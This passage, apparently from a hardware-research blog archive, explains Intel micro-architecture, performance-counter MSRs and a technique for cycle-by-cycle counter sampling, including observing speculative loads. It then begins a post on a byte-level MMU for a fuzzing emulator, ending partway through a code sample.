In modern CPUs, applications almost never interface with physical memory directly. Rather they go through address translation to convert virtual addresses to physical addresses. This allows contiguous virtual memory regions to map to fragmented physical memory. Performing this translation requires 4 memory accesses (on 64-bit 4-level paging), and is quite expensive. Thus the CPU caches recently translated addresses such that it can skip this translation process during memory operations.

It is up to the OS to tell the CPU when to flush these TLBs via the invalidate page (invlpg) instruction. If the OS doesn’t correctly invlpg memory when mappings change, it’s possible to use stale translation information.
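
As a small ring-0-only sketch, invalidating the TLB entry covering a single page might look like this from Rust; the function name is just for illustration:

use core::arch::asm;

/// Invalidate the TLB entry covering `addr` on the current core.
/// Illustrative sketch only; must be executed at ring 0.
unsafe fn invlpg(addr: usize) {
    asm!("invlpg [{}]", in(reg) addr, options(nostack, preserves_flags));
}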

Line fill buffers

While a load is pending, and not yet present in L1 cache, the data lives in a line fill buffer. The line fill buffers live between L2 cache and your L1 cache. When a memory access misses L1 cache, a line fill buffer entry is allocated, and once the load completes, the LFB is copied into the L1 cache and the LFB entry is discarded.

Store buffer

Store buffers are similar to line fill buffers. While waiting for resources to be available for a store to complete, it is placed into a store buffer. This allows for up to 56 stores (on Skylake) to be queued up, even if all other aspects of the memory subsystem are currently busy, or stores are not ready to be retired.

Further, loads which access memory will query the store buffers to potentially bypass the cache. If a read occurs on a recently stored location, the read could directly be filled from the store buffers. This is called store forwarding.

Load buffers

Similar to store buffers, load buffers are used for pending load uops. This sits between your execution units and L1 cache. This can hold up to 72 entries on Skylake.

CPU architecture summary and more info

That was a pretty high level introduction to many of the aspects of modern Intel CPU architecture. Every component of this diagram could have an entire blog written on it. Intel Manuals, WikiChip, Agner Fog’s CPU documentation, and many more, provide a more thorough documentation of Intel micro-architecture.


Sushi Roll

Sushi Roll is one of my favorite kernels! It wasn’t originally designed for CPU introspection, but it had some neat features which made it much more suitable for CPU research than my other kernels. We’ll talk a bit about why this kernel exists, and then talk about why it quickly became my go-to kernel for CPU research.

Kernel mascot: Squishable Sushi Roll

A primer on Knights Landing

Sushi Roll was originally designed for my Vectorized Emulation work. Vectorized emulation was designed for the Intel Xeon Phi (Knights Landing), which is a pretty strange architecture. Even though it’s fully-featured traditional x86 and standard software will “just work” on it, it is quite slow per individual thread. First of all, the clock rates are ~1.3 GHz, so there alone it’s about 2-3x slower than a “standard” x86 processor. Even further, it has fewer CPU resources for re-ordering and instruction decode. All-in-all the CPU is about 10x slower when running a single-threaded application compared to a “standard” 3 GHz modern Intel CPU. There’s also no L3 cache, so memory accesses can become much more expensive.

On top of these simple performance issues, there are more complex issues due to 4-way hyperthreading. Knights Landing was designed to be 4-way hyperthreaded (4 threads per core) to alleviate some of the performance losses of the limited instruction decode and caching. This allows threads to “block” on memory accesses while other threads with pending computations use the execution units. This 4-way hyperthreading, combined with 64-core processors, leads to 256 hardware threads showing up to your OS as cores.

Migrating processes and resources between these threads can be catastrophically slow. Standard shared-memory models also start to fall apart at this level of scaling (without specialized tuning). For example: If all 256 threads are hammering the same memory by performing an atomic increment (lock inc instruction), each individual increment will start to cost over 10,000 cycles! This is enough time for a single core on the Xeon Phi to do 640,000 single-precision floating point operations… just from a single increment! While most software treats atomics as “free locks”, they start to cause some serious cache-coherency pollution when scaled out this wide.

Obviously with some careful development you can mitigate these issues by decreasing the frequency of shared memory accesses. But perhaps we can develop a kernel that fundamentally disallows this behavior, preventing a developer from ever starting to go down the wrong path!

The original intent of Sushi Roll

Sushi Roll was designed from the start to be a massively parallel message-passing based kernel. The most notable feature of Sushi Roll is that there is no mutable shared memory allowed (a tiny exception made for the core IPC mechanism). This means that if you ever want to share information with another processor, you must pass that information via IPC. Shared immutable memory however, is allowed, as this doesn’t cause cache coherency traffic.

This design also meant that a lock never needed to be held, even atomic-level locks using the lock prefix. Rather than using locks, a specific core would own a hardware resource. For example, core #0 may own the network card, or a specific queue on the network card. Instead of requesting exclusive access to the NIC by obtaining a lock, you would send a message to core #0, indicating that you want to send a packet. All of the processing of these packets is done by the sender, thus the data is already formatted in a way that can be directly dropped into the NIC ring buffers. This made the owner of a hardware resource simply a mediator, reducing the latency to that resource.

While this makes the internals of the kernel a bit more complex, the programming model that a developer sees is still a standard send()/recv() model. By forcing message-passing, this ensured that all software written for this kernel could be scaled between multiple machines with no modification. On a single computer there is a fast, low-latency IPC mechanism that leverages some of the abilities to share memory (by transferring ownership of physical memory to the receiver). If the target for a message resided on another computer on the network, then the message would be serialized in a way that could be sent over the network. This complexity is yet again hidden from the developer, which allows for one program to be made that is scaled out without any extra effort.

No interrupts, no timers, no software threads, no processes

Sushi Roll follows a similar model to most of my other kernels. It has no interrupts, no timers, no software threads, and no processes. These are typically required for traditional operating systems to provide a user experience with multiple processes and users. However, my kernels are always designed for one purpose. This means the kernel boots up, and just does a given task on all cores (sometimes with one or two cores having a “special” responsibility).

By removing all of these external events, the CPU behaves a lot more deterministically. Sushi Roll goes the extra mile here, as it further reduces CPU noise by not having cores sharing memory and causing unexpected cache evictions or coherency traffic.

Soft Reboots

Similar to kexec on Linux, my kernels always support soft rebooting. This allows the old kernel (even a double faulted/corrupted kernel) to be replaced by a new kernel. This process takes about 200-300ms to tear down the old kernel, download the new one over PXE, and run the new one. This makes it feasible to have such a specialized kernel without processes, since I can just change the code of the kernel and boot up the new one in under a second. Rapid prototyping is crucial to fast development, and without this feature this kernel would be unusable.

Sushi Roll conclusion

Sushi Roll ended up being the perfect kernel for CPU introspection. It’s the lowest noise kernel I’ve ever developed, and it happened to also be my flagship kernel right as Spectre and Meltdown came out. By not having processes, threads, or interrupts, the CPU behaves much more deterministically than in a traditional OS.


Performance Counters

Before we get into how we got cycle-by-cycle micro-architectural data, we must learn a little bit about the performance monitoring available on Intel CPUs! This information can be explored in depth in the Intel Software Developer Manual Volume 3b (note that the combined volume 3 manual doesn’t go into as much detail as the specific sub-volume manual).

Performance Counter Manual

Intel CPUs have a performance monitoring subsystem relying largely on a set of model-specific-registers (MSRs). These MSRs can be configured to track certain architectural events, typically by counting them. These counters are formally “performance monitoring counters”, often referred to as “performance counters” or PMCs.

These PMCs vary by micro-architecture. However, over time Intel has committed to offering a small subset of counters between multiple micro-architectures. These are called architectural performance counters. The version of these architectural performance counters is found in CPUID.0AH:EAX[7:0]. As of this writing there are 4 versions of architectural performance monitoring. The latest version provides a decent amount of generic information useful to general-purpose optimization. However, for a specific micro-architecture, the possibilities of performance events to track are almost limitless.

Basic usage of performance counters

To use the performance counters on Intel there are a few steps involved. First you must find a performance event you want to monitor. This information is found in per-micro-architecture tables found in the Intel Manual Volume 3b “Performance-Monitoring Events” chapter.

For example, here’s a very small selection of Skylake-specific performance events:

Skylake Events

Intel performance counters largely rely on two banks of MSRs: the performance event selection MSRs, where the different events are programmed using the umask and event numbers from the table above, and the performance counter MSRs, which hold the counts themselves.

The performance event selection MSRs (IA32_PERFEVTSELx) start at address 0x186 and span a contiguous MSR region. The layout of these event selection MSRs varies slightly by micro-architecture. The number of counters available varies by CPU and is dynamically checked by reading CPUID.0AH:EAX[15:8]. The performance counter MSRs (IA32_PMCx) start at address 0xc1 and also span a contiguous MSR region. The counters have a micro-architecture-specific number of bits they support, found in CPUID.0AH:EAX[23:16]. Reading and writing these MSRs is done via the rdmsr and wrmsr instructions respectively.

Typically modern Intel processors support 4 PMCs, and thus will have 4 event selection MSRs (0x186, 0x187, 0x188, and 0x189) and 4 counter MSRs (0xc1, 0xc2, 0xc3, and 0xc4). Most processors have 48-bit performance counters. It’s important to dynamically detect this information!
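
As a quick illustration of that dynamic detection, the CPUID leaf mentioned above can be queried directly; this little Rust program (x86_64 only) pulls out the fields described in the text:

use std::arch::x86_64::__cpuid;

fn main() {
    // CPUID.0AH enumerates architectural performance monitoring
    let leaf = unsafe { __cpuid(0x0a) };

    let version      =  leaf.eax        & 0xff; // EAX[7:0]   PMC version
    let num_counters = (leaf.eax >>  8) & 0xff; // EAX[15:8]  programmable PMCs
    let counter_bits = (leaf.eax >> 16) & 0xff; // EAX[23:16] bits per counter

    println!("PMC version {} with {} counters of {} bits",
        version, num_counters, counter_bits);
}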

Here’s what the IA32_PERFEVTSELx MSR looks like for PMC version 3:

Performance Event Selection

Event Select: Holds the event number from the event tables, for the event you are interested in
Unit Mask: Holds the umask value from the event tables, for the event you are interested in
USR: If set, this counter counts during user-land code execution (ring level != 0)
OS: If set, this counter counts during OS execution (ring level == 0)
E: If set, enables edge detection of the event being tracked. Counts de-asserted to asserted transitions, which allows for timing of events
PC: Pin control allows for some hardware monitoring of events, like… the actual pins on the CPU
INT: Generate an interrupt through the APIC if an overflow occurs of the (usually 48-bit) counter
ANY: Increment the performance event when any hardware thread on a given physical core triggers the event, otherwise it only increments for a single logical thread
EN: Enable the counter
INV: Invert the counter mask, which changes the meaning of the CMASK field from a >= comparison (if this bit is 0), to a < comparison (if this bit is 1)
CMASK: If non-zero, the CPU only increments the performance counter when the event is triggered >= (or < if INV is set) CMASK times in a single cycle. This is useful for filtering events to more specific situations. If zero, this has no effect and the counter is incremented for each event

And that’s about it! Find the right event you want to track in your specific micro-architecture’s table, program it in one of the IA32_PERFEVTSELx registers with the correct event number and umask, set the USR and/or OS bits depending on what type of code you want to track, and set the EN bit to enable it! Now the corresponding IA32_PMCx counter will be incrementing every time that event occurs!
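
To tie the fields together, here’s a rough sketch of building an IA32_PERFEVTSELx value and programming PMC0 through IA32_PERFEVTSEL0 (MSR 0x186). The bit positions follow the standard IA32_PERFEVTSELx layout, the helper names are made up for this example, and the wrmsr of course requires ring 0:

use core::arch::asm;

/// Write a value to a model specific register (ring 0 only)
unsafe fn wrmsr(msr: u32, value: u64) {
    let lo = value as u32;
    let hi = (value >> 32) as u32;
    asm!("wrmsr", in("ecx") msr, in("eax") lo, in("edx") hi,
         options(nostack, preserves_flags));
}

/// Build an IA32_PERFEVTSELx value from an event/umask pair, counting in
/// both user and OS mode, with the counter enabled
fn perfevtsel(event: u8, umask: u8) -> u64 {
    (event as u64)        | // Event select [7:0]
    ((umask as u64) << 8) | // Unit mask    [15:8]
    (1 << 16)             | // USR: count ring != 0
    (1 << 17)             | // OS:  count ring == 0
    (1 << 22)               // EN:  enable the counter
}

/// Example: program PMC0 via IA32_PERFEVTSEL0 (MSR 0x186) with event 0xc0,
/// umask 0x00, which on many Intel parts is the instructions-retired event
unsafe fn program_pmc0() {
    wrmsr(0x186, perfevtsel(0xc0, 0x00));
}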

Reading the PMC counts faster

Instead of performing a rdmsr instruction to read the IA32_PMCx values, a rdpmc instruction can be used. This instruction is optimized to be a little bit faster and supports a “fast read mode” if ecx[31] is set to 1. This is typically how you’d read the performance counters.
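
A minimal rdpmc wrapper might look like the following; it needs ring 0 (or ring 3 with CR4.PCE set), and the function name is just illustrative:

use core::arch::asm;

/// Read performance counter `index` via `rdpmc`. OR in (1 << 31) for the
/// "fast read mode" described above, if the processor supports it.
unsafe fn rdpmc(index: u32) -> u64 {
    let (hi, lo): (u32, u32);
    asm!("rdpmc", in("ecx") index, out("eax") lo, out("edx") hi,
         options(nostack, preserves_flags));
    ((hi as u64) << 32) | (lo as u64)
}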

Performance Counters version 2

In the second version of performance counters, Intel added a bunch of new features.

Intel added some fixed performance counters (IA32_FIXED_CTR0 through IA32_FIXED_CTR2, starting at address 0x309) which are not programmable. These are configured by IA32_FIXED_CTR_CTRL at address 0x38d. Unlike normal PMCs, these cannot be programmed to count any event. Rather the controls for these only allow the selection of which CPU ring level they increment at (or none to disable it), and whether or not they trigger an interrupt on overflow. No other control is provided for these.

IA32_FIXED_CTR0 (MSR 0x309): Counts number of retired instructions
IA32_FIXED_CTR1 (MSR 0x30a): Counts number of core cycles while the processor is not halted
IA32_FIXED_CTR2 (MSR 0x30b): Counts number of timestamp counts (TSC) while the processor is not halted

These are then enabled and disabled by:

Fixed Counter Control

The second version of performance counters also added 3 new MSRs that allow “bulk management” of performance counters. Rather than checking the status and enabling/disabling each performance counter individually, Intel added 3 global control MSRs. These are IA32_PERF_GLOBAL_CTRL (address 0x38f) which allows enabling and disabling performance counters in bulk. IA32_PERF_GLOBAL_STATUS (address 0x38e) which allows checking the overflow status of all performance counters in one rdmsr. And IA32_PERF_GLOBAL_OVF_CTRL (address 0x390) which allows for resetting the overflow status of all performance counters in one wrmsr. Since rdmsr and wrmsr are serializing instructions, these can be quite expensive and being able to reduce the number of them is important!

Global control (simple, allows masking of individual counters from one MSR):

Performance Global Control

Status (tracks overflows of various counters, with a global condition changed tracker):

Performance Global Status

Status control (writing a 1 to any of these bits clears the corresponding bit in IA32_PERF_GLOBAL_STATUS):

Performance Global Status

Finally, Intel added 2 bits to the existing IA32_DEBUGCTL MSR (address 0x1d9). These 2 bits Freeze_LBR_On_PMI (bit 11) and Freeze_PerfMon_On_PMI (bit 12) allow freezing of last branch recording (LBR) and performance monitoring on performance monitor interrupts (often due to overflows). These are designed to reduce the measurement of the interrupt itself when an overflow condition occurs.
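
A hedged sketch of flipping those two freeze bits on (ring 0 only, helper names made up for this example) could look like:

use core::arch::asm;

const IA32_DEBUGCTL: u32 = 0x1d9;

unsafe fn rdmsr(msr: u32) -> u64 {
    let (hi, lo): (u32, u32);
    asm!("rdmsr", in("ecx") msr, out("eax") lo, out("edx") hi,
         options(nostack, preserves_flags));
    ((hi as u64) << 32) | (lo as u64)
}

unsafe fn wrmsr(msr: u32, value: u64) {
    let lo = value as u32;
    let hi = (value >> 32) as u32;
    asm!("wrmsr", in("ecx") msr, in("eax") lo, in("edx") hi,
         options(nostack, preserves_flags));
}

/// Turn on freezing of LBRs and PMCs when a performance monitoring
/// interrupt fires (bits 11 and 12 as described above)
unsafe fn enable_freeze_on_pmi() {
    let old = rdmsr(IA32_DEBUGCTL);
    wrmsr(IA32_DEBUGCTL, old | (1 << 11) | (1 << 12));
}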

Performance Counters version 3

Performance counters version 3 was pretty simple. Intel added the ANY bit to IA32_PERFEVTSELx and IA32_FIXED_CTR_CTRL to allow tracking of performance events on any thread on a physical core. Further, the performance counters went from a fixed number of 2 counters, to a variable number of counters. This resulted in more bits being added to the global status, overflow, and overflow control MSRs, to control the corresponding counters.

Performance Global Status

Performance Counters version 4

Performance counters version 4 is pretty complex in detail, but ultimately it’s fairly simple. Intel renamed some of the MSRs (for example IA32_PERF_GLOBAL_OVF_CTRL became IA32_PERF_GLOBAL_STATUS_RESET). Intel also added a new MSR IA32_PERF_GLOBAL_STATUS_SET (address 0x391) which instead of clearing the bits in IA32_PERF_GLOBAL_STATUS, allows for setting of the bits.

Further, the freezing behavior enabled by IA32_DEBUGCTL.Freeze_LBR_On_PMI and IA32_DEBUGCTL.Freeze_PerfMon_On_PMI was streamlined to have a single bit which tracks the “freeze” state of the PMCs, rather than clearing the corresponding bits in the IA32_PERF_GLOBAL_CTRL MSR. This change is awesome as it reduces the cost of freezing and unfreezing the performance monitoring unit (PMU), but it’s actually a breaking change from previous versions of performance counters.

Finally, they added a mechanism to allow sharing of performance counters between multiple users. This is not really relevant to anything we’re going to talk about, so we won’t go into details.

Conclusion

Performance counters started off pretty simple, but Intel added more and more features over time. However, these “new” features are critical to what we’re about to do next :)


Cycle-by-cycle micro-architectural sampling

Now that we’ve gotten some prerequisites out of the way, let’s talk about the main course of this blog: A creative use of performance counters to get cycle-by-cycle micro-architectural information out of Intel CPUs!

It’s important to note that this technique is meant to assist in finding and learning things about CPUs. The data it generates is not particularly easy to interpret or work with, and there are many pitfalls to be aware of!

The Goal

Performance counters are incredibly useful in categorizing micro-architectural behavior on an Intel CPU. However, these counters are often applied to a whole block of code or even an entire program, and viewed as a single data point over the whole run. For example, one might use performance counters to track the number of times there’s a cache miss in their program under test. This will give a single number as an output, giving an indication of how many times the cache was missed, but it doesn’t help much in telling you when they occurred. By some binary searching (or creative use of counter overflows) you can get a general idea of when the event occurred, but I wanted more information.

More specifically, I wanted to view micro-architectural data on a graph, where the x-axis was in cycles. This would allow me to see (with cycle-level granularity) when certain events happened in the CPU.

The Idea

We’ve set a pretty lofty goal for ourselves. We effectively want to link two performance counters with each other. In this case we want to use an arbitrary performance counter for some event we’re interested in, and we want to link it to a performance counter tracking the number of cycles elapsed. However, there doesn’t seem to be a direct way to perform this linking.

We know that we can have multiple performance counters, so we can configure one to count a given event, and another to count cycles. However, in this case we’re not able to capture information at each cycle, as we have no way of reading these counters together. We also cannot stop the counters ourselves, as stopping the counters requires injecting a wrmsr instruction which cannot be done on an arbitrary cycle boundary, and definitely cannot be done during speculation.

But there’s a small little trick we can use. We can stop multiple performance counters at the same time by using the IA32_DEBUGCTL.Freeze_PerfMon_On_PMI feature. When a counter ends up overflowing, an interrupt occurs (if configured as such). When this overflow occurs, the freeze bit in IA32_PERF_GLOBAL_STATUS is set (version 4 PMCs specific feature), causing all performance counters to stop.

This means that if we can cause an overflow on each cycle boundary, we could potentially capture the time and the event we’re interested in at the same time. Doing this isn’t too difficult either, as we can simply pre-program the performance counter value IA32_PMCx to N away from overflow. In our specific case, we’re dealing with a 48-bit performance counter. So in theory, if we program PMC0 to count cycles and set the counter to 2^48 - N where N is >= 1, we can get an interrupt, and thus an “atomic” disabling of performance counters, after N cycles.

If we set up a deterministic enough execution environment, we can run the same code over and over, while adjusting N to sample the code at a different cycle count.

This relies on a lot of assumptions. We’re assuming that the freeze bit ends up disabling both performance counters at the same time (“atomically”), we’re assuming we can cause this interrupt on an arbitrary cycle boundary (even during multi-cycle instructions), and we also are assuming that we can execute code in a clean enough environment where we can do multiple runs measuring different cycle offsets.

So… let’s try it!

The Implementation

A simple pseudo-code implementation of this sampling method looks as such:

/// Number of times we want to sample each data point. This allows us to look
/// for the minimum, maximum, and average values. This also gives us a way to
/// verify that the environment we're in is deterministic and the results are
/// sane. If minimum == maximum over many samples, it's safe to say we have a
/// very clear picture of what is happening.
const NUM_SAMPLES: u64 = 1000;

/// Maximum number of cycles to sample on the x-axis. This limits the sampling
/// space.
const MAX_CYCLES: u64 = 1000;

// Program the APIC to map the performance counter overflow interrupts to a
// stub assembly routine which simply `iret`s out
configure_pmc_interrupts_in_apic();

// Configure performance counters to freeze on interrupts
perf_freeze_on_overflow();

// Iterate through each performance counter we want to gather data on
for perf_counter in performance_counters_of_interest {
    // Disable and reset all performance counters individually
    // Clearing their counts to 0, and clearing their event select MSRs to 0
    disable_all_perf_counters();

    // Disable performance counters globally by setting IA32_PERF_GLOBAL_CTRL
    // to 0
    disable_perf_globally();

    // Enable a performance counter (lets say PMC0) to track the `perf_counter`
    // we're interested in. Note that this doesn't start the counter yet, as we
    // still have the counters globally disabled.
    enable_perf_counter(perf_counter);

    // Go through each number of samples we want to collect for this performance
    // counter... for each cycle offset.
    for _ in 0..NUM_SAMPLES {
        // Go through each cycle we want to observe
        for cycle_offset in 1..=MAX_CYCLES {
            // Clear out the performance counter values: IA32_PMCx fields
            clear_perf_counters();

            // Program fixed counter #1 (un-halted cycle counter) to trigger
            // an interrupt on overflow. This will cause an interrupt, which
            // will then cause a freeze of all PMCs.
            program_fixed1_interrupt_on_overflow();

            // Program the fixed counter #1 (un-halted cycle counter) to
            // `cycles` prior to overflowing
            set_fixed1_value((1 << 48) - cycle_offset);

            // Do some pre-test environment setup. This is important to make
            // sure we can sample the code under test multiple times and get
            // the same result. Here is where you'd be flushing cache lines,
            // maybe doing a `wbinvd`, etc.
            set_up_environment();

            // Enable both the fixed #1 cycle counter and the PMC0 performance
            // counter (tracking the stat we're interested in) at the same time,
            // by using IA32_PERF_GLOBAL_CTRL. This is serializing so you don't
            // have to worry about re-ordering across this boundary.
            enable_perf_globally();

            asm!(r#"

                asm
                under
                test
                here

            "# :::: "volatile");

            // Clear IA32_PERF_GLOBAL_CTRL to 0 to stop counters
            disable_perf_globally();

            // If fixed PMC #1 has not overflowed, then we didn't capture
            // relevant data. This only can happen if we tried to sample a
            // cycle which happens after the assembly under test executed.
            if fixed1_pmc_overflowed() == false {
                continue;
            }

            // At this point we can do whatever we want as the performance
            // counters have been turned off by the interrupt and we should have
            // relevant data in both :)

            // Get the count from fixed #1 PMC. It's important that we grab this
            // as interrupts are not deterministic, and thus it's possible we
            // "overshoot" the target
            let fixed1_count = read_fixed1_counter();

            // Add the distance-from-overflow we initially programmed into the
            // fixed #1 counter, with the current value of the fixed #1 counter
            // to get the total number of cycles which have elapsed during
            // our example.
            let total_cycles = cycle_offset + fixed1_count;

            // Read the actual count from the performance counter we were using.
            // In this case we were using PMC #0 to track our event of interest.
            let value = read_pmc0();

            // Somehow log that performance counter `perf_counter` had a value
            // `value` `total_cycles` into execution
            log_result(perf_counter, value, total_cycles);
        }
    }
}

Simple results

So? Does it work? Let’s try with a simple example of code that just does a few “nops” by adjusting the stack a few times:

add rsp, 8
sub rsp, 8
add rsp, 8
sub rsp, 8

Simple Sample

So how do we read this graph? Well, the x-axis is simple. It’s the time, in cycles, of execution. The y-axis is the number of events (which varies based on the key). In this case we’re only graphing the number of instructions retired (successfully executed).

So does this look right? Hmmm…. we ran 4 instructions, why did we see 8 retire?

Well in this case there’s a little bit of “extra” noise introduced by the harnessing around the code under test. Let’s zoom out from our code and look at what actually executes during our test:

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f ; IA32_PERF_GLOBAL_CTRL
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

; Here's our code under test :D
00000011  4883C408          add rsp,byte +0x8
00000015  4883EC08          sub rsp,byte +0x8
00000019  4883C408          add rsp,byte +0x8
0000001D  4883EC08          sub rsp,byte +0x8

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000021  B98F030000        mov ecx,0x38f
00000026  31C0              xor eax,eax
00000028  31D2              xor edx,edx
0000002A  0F30              wrmsr

So if we take another look at the graph, we see there are 8 instructions that retired. The very first instruction we see retire (at cycle=11), is actually the wrmsr we used to enable the counters. This makes sense, at some point prior to retirement of the wrmsr instruction the counters must be enabled internally somewhere in the CPU. So we actually get to see this instruction retire!

Then we see 7 more instructions retire to give us a total of 8… hmm. Well, we have 4 of our add and sub mix that we executed, so that brings us down to 3 more remaining “unknown” instructions.

These 3 remaining instructions are explained by the code which disables the performance counter after our test code has executed. We have 1 mov, and 2 xor instructions which retire prior to the wrmsr which disables the counters. It makes sense that we never see the final wrmsr retire as the counters will be turned off in the CPU prior to the wrmsr instruction retiring!

Voila! It all makes sense. We now have a great view into what the CPU did in terms of retirement for this code in question. Everything we saw lined up with what actually executed; always good to see.

A bit more advanced result

Let’s add a few more performance counters to track. In this case let’s track the number of instructions retired, as well as the number of micro-ops dispatched to port 4 (the store port). This will give us the number of stores which occurred during the test.

Code to test (just a few writes to the stack):

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

00000011  4883EC08          sub rsp,byte +0x8
00000015  48C7042400000000  mov qword [rsp],0x0
0000001D  4883C408          add rsp,byte +0x8
00000021  4883EC08          sub rsp,byte +0x8
00000025  48C7042400000000  mov qword [rsp],0x0
0000002D  4883C408          add rsp,byte +0x8

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000031  B98F030000        mov ecx,0x38f
00000036  31C0              xor eax,eax
00000038  31D2              xor edx,edx
0000003A  0F30              wrmsr

Store Sample

This one is fun. We simply make room on the stack (sub rsp), write a 0 to the stack (mov [rsp]), and then restore the stack (add rsp), and then do it all again one more time.

Here we added another plot to the graph, Port 4, which is the store uOP port on the CPU. We also track the number of instructions retired, as we did in the first example. Here we can see instructions retired matches what we would expect. We see 10 retirements, 1 from the first wrmsr enabling the performance counters, 6 from our own code under test, and 3 more from the disabling of the performance counters.

This time we’re able to see where the stores occur, and indeed, 2 stores do occur. We see a store happen at cycle=28 and cycle=29. Interestingly we see the stores are back-to-back, even though there’s a bit of code between them. We’re probably observing some re-ordering! Later in the graph (cycle=39), we observe that 4 instructions get retired in a single cycle! How cool is that?!

How deep can we go?

Using the exact same store example from above, we can enable even more performance counters. This gives us an even more detailed view of different parts of the micro-architectural state.

Busy Sample

In this case we’re tracking all uOP port activity, machine clears (when the CPU resets itself after speculation), offcore requests (when messages get sent offcore, typically to access physical memory), instructions retired, and branches retired. In theory we can measure any possible performance counter available on our micro-architecture on a time domain. This gives us the ability to see almost anything that is happening on the CPU!

Noise…

In all of the examples we’ve looked at, none of the data points have visible error bars. In these graphs the error bars represent the minimum value, mean value, and maximum value observed for a given data point. Since we’re running the same code over and over, and sampling it at different execution times, it’s very possible for “random” noise to interfere with results. Let’s look at a bit more noisy example:

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

00000011  48C7042500000000  mov qword [0x0],0x0
         -00000000
0000001D  48C7042500000000  mov qword [0x0],0x0
         -00000000
00000029  48C7042500000000  mov qword [0x0],0x0
         -00000000
00000035  48C7042500000000  mov qword [0x0],0x0
         -00000000

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000041  B98F030000        mov ecx,0x38f
00000046  31C0              xor eax,eax
00000048  31D2              xor edx,edx
0000004A  0F30              wrmsr

Here we’re just going to write to NULL 4 times. This might sound bad, but in this example I mapped NULL in as normal write-back memory. Nothing crazy, just treat it as a valid address.

But here are the results:

Noise Sample

Hmmm… we have error bars! We see the stores always get dispatched at the same time. This makes sense, we’re always doing the same thing. But we see that some of the instructions have some variance in where they retire. For example, at cycle=38 we see that sometimes at this point 2 instructions have been retired, other times 4 have been retired, but on average a little over 3 instructions have been retired at this point. This tells us that the CPU isn’t always deterministic in this environment.

These results can get a bit more complex to interpret, but it’s still relevant data nevertheless. Changing the code under test, cleaning up the environment to be more deterministic, etc., can often improve the quality and visibility of the data.

Does it work with speculation?

Damn right it does! That was the whole point!

Let’s cause a fault, perform some loads behind it, and see if we can see the loads get issued even though the entire section of code is discarded.

    // Start a TSX section, think of this as a `try {` block
    xbegin 2f

    // Read from -1, causing a fault
    mov rax, [-1]

    // Here's some loads shadowing the faulting load. These
    // should never occur, as the instruction above causes
    // an exception and thus execution should "jump" to the label `2:`

    .rept 32
        // Repeated load 32 times
        mov rbx, [0]
    .endr

    // End the TSX section, think of this as a `}` closing the
    // `try` block
    xend

2:
    // Here is where execution goes if the TSX section had
    // an exception, and thus where execution will flow

Speculation Sample

Both port 2 and port 3 are load ports. We see both of them taking turns handling loads (1 load per cycle each, with 2 ports, 2 loads per cycle total). Here we can see many different loads get dispatched, even though very few instructions actually retire. What we’re viewing here is the micro-architecture performing speculation! Neat!

More data?

I could go on and on graphing different CPU behaviors! There’s so much cool stuff to explore out there. However, this blog has already gotten longer than I wanted, so I’ll stop here. Maybe I’ll make future small blogs about certain interesting behaviors!


Conclusion

This technique of measuring performance counters on a time-domain seems to work quite well. You have to be very careful with noise, but with careful interpretation of the data, this technique provides the highest level of visibility into the Intel micro-architecture that I’ve ever seen!

This tool is incredibly useful for validating hypotheses about behaviors of various Intel micro-architectures. By running multiple experiments on different behaviors, a more macro-level model can be derived about the inner workings of the CPU. This could lead to learning new optimization techniques, finding new CPU vulnerabilities, and just in general having fun learning how things work!


Source?

Update: 8/19/2019

This kernel has too many sensitive features that I do not want to make public at this time…

However, it seems there’s a lot of interest in this tech, so I will try to live stream soon adding this functionality to my already-open-source kernel Orange Slice!


Vectorized Emulation: MMU Design

19 November 2018 at 19:10

Softserve

New vectorized emulator codenamed softserve

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up.

Check out the intro

This is the continuation of a multipart series. See the introduction post here

This post assumes you’ve read the intro and doesn’t explain some of the basics of the vectorized emulation concept. Go read it if you haven’t!

Further this blog is a lot more technical than the introduction. This is meant to go deep enough to clear up most/all potential questions about the MMU. It expects that you have a general knowledge of page tables and virtual addressing models. Hopefully we do a decent job explaining these things such that it’s not a hard requirement!

The code

This blog explains the intent behind a pretty complex MMU design. The code that this blog references can be found here. I have no plans to open source the vectorized emulator and this MMU is just a snapshot of what this blog is explaining. I have no intent to update this code as I change my MMU model. Further this code is not buildable as I’m not open sourcing my assembler, however I assume the syntax is pretty obvious and can be read as pseudocode.

By sharing this code I can talk at a higher level and allow the nitty-gritty details to be explained by the actual implementation.

It’s also important to note that this code is not being used in production yet. It’s got room for micro-optimizations and polish. At least it should be doing the correct operations and hopefully the tests are verifying this. Right now I’m trying to keep it simple to make sure it’s correct and then polish it later using this version as reference.

Intro

Today we’re going to talk about the internals of the memory management unit (MMU) design I have used in my vectorized emulator. The MMU is responsible for creating the fake memory environment of the VMs that run under the emulator. Further, the MMU design used here is also built to catch bugs as early as possible. To do this we implement what I call a “byte-level MMU”, where each byte has its own permission bits. Since vectorized emulation is meant for fuzzing, it’s also important that the memory state can be restored to the original state quickly so a new fuzz iteration can be started.
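
To give a rough idea of what “byte-level” means here, a naive model is simply a parallel array of permission bytes, one per guest byte, checked on every access. The sketch below is purely illustrative (and far slower than the real MMU described in this blog); the flag names and types are made up for this example:

// Illustrative only: one permission byte per guest byte of memory
const PERM_READ:  u8 = 1 << 0;
const PERM_WRITE: u8 = 1 << 1;
const PERM_EXEC:  u8 = 1 << 2;

struct ByteMemory {
    bytes: Vec<u8>, // guest memory contents
    perms: Vec<u8>, // one permission byte per guest byte (same length as `bytes`)
}

impl ByteMemory {
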